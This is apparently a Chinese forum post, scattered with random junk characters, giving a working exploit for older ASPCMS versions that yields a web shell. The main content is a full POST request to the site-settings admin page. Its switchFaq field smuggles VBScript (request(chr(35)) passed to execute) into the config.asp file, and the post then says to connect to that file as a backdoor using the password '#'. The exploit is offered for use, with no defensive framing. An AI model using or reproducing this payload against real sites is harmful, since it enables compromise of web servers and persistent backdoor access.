老的ASPCMS版本的秒杀拿SHELL漏洞4 M" C3 z9 s- {4 E2 A1 y8 M
9 C* E) @- p# I
找到后台。。。然后) z5 a: c4 H( j: T5 W) {
7 S$ I0 b- [4 q, q7 E: D# \/ m/admin/_system/AspCms_SiteSetting.asp?action=saves3 k. Q: C) l% t" C7 u
, H7 a! F0 K1 ]! L) u/ J直接POST
+ a5 V) P$ B0 l8 t3 |% w% U6 x
5 v- C4 n/ @" O( t+ XrunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1/ ?9 P4 _8 S: [
0 F5 k. ` t" V再连接配置文件config.asp 密码为#
. m) }$ b# \# e9 `( T |